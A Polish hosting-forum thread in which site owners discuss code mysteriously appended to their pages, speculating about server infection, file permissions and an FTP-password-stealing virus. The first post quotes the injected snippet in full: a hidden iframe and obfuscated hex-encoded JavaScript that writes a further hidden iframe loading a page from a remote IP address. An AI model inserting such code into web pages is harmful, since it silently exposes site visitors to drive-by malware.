1000gp <iframe src='http://url' width='1' height='1' style='visibility: hidden;

cieszak - 22-12-2007 19:37
1000gp <iframe src='http://url' width='1' height='1' style='visibility: hidden;
Kilkanaście dni temu zauważyłem że coś doklejało się do stron mojego znajomego który korzysta z 1000gp, myślałem że może on ma na dysku jakiegoś wirusa i wysyła na serwer zarażone pliki.
Ale dzisiaj zobaczyłem, że na mojej stronie też to sie pojawiło, przy czym ja nie wysyłałem żadnych plików od dawna.

Do kodu strony doklajało się coś takiego
Kod: <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4765bd5db9ec5(v4765bd5dba27d){ var v4765bd5dba673=16; return(parseInt(v4765bd5dba27d,v4765bd5dba673));}function v4765bd5dbb267(v4765bd5dbb663){ var v4765bd5dbd217=2; var v4765bd5dbbe5b='';for(v4765bd5dbca1c=0; v4765bd5dbca1c<v4765bd5dbb663.length; v4765bd5dbca1c+=v4765bd5dbd217){ v4765bd5dbbe5b+=(String.fromCharCode(v4765bd5db9ec5(v4765bd5dbb663.substr(v4765bd5dbca1c, v4765bd5dbd217))));}return v4765bd5dbbe5b;} document.write(v4765bd5dbb267('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D63336238656362353864207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313439393430292B273134346634366562645C272077696474683D373335206865696768743D323034207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script> Czy na serwerze nie ma przypadkiem jakiegoś wirusa?

Bruno - 22-12-2007 19:43
Czesc,

Cytat:
Czy na serwerze nie ma przypadkiem jakiegoś wirusa? Chyba to twoje pliki.. sprawdz ich CHMOD.. Nie musza byc "writable", just "readable" i "executable" 555 chmod najlepszy ;)

cieszak - 01-01-2008 21:37
ja miałem chmoda 644 ale to nie zmienia faktu że coś z serwerem było nie tak, teraz już chyba to naprawione bo już od jakiegoś czasu nic się nie dokleja, ale może chociaż by ktoś z administratorów wyjaśnił co to było? :p

mariano - 02-01-2008 10:55
Serwer nic Ci nie dokleja, nie ma takiej mozliwosci. Prawdopodobnie uzywasz na stronie jakiegos "darmowego" licznika czy czegos podobnego - wiele osob ma tego rodzaju problemy, nic na to nie poradze. Najlepszym sposobem na "doklejki" jest unikanie odwolan do nieswojego kodu javascript / php. Pomijam oczywiscie kwestie zabezpieczen przed XSS, bo o tym chyba nikomu nie trzeba mowic...

cieszak - 27-02-2008 12:24
jedynym kodem "zewnętrznym" na mojej stronie był kod stat4u, ale na stronie mojego znajomego była czysta joomla bez stat4u

konread - 05-03-2009 12:49
To nie wina serwera, od 2 tygodni szaleje groźny wirus, który wykrada nawet zaszyfrowane hasła z popularnych klientów FTP, takich jak FileZilla, Total Commander i innych.
Na razie jedyną receptą jest:
1 przeskanować komputer
2 niech klient FTP nie zapamiętuje haseł
3 nie korzystać w ogóle z Total Commander - ponoć przede wszystkim z niego wydobywane są hasła

Rozz - 05-03-2009 12:58
a ten wirus to jakas nazwe ma ?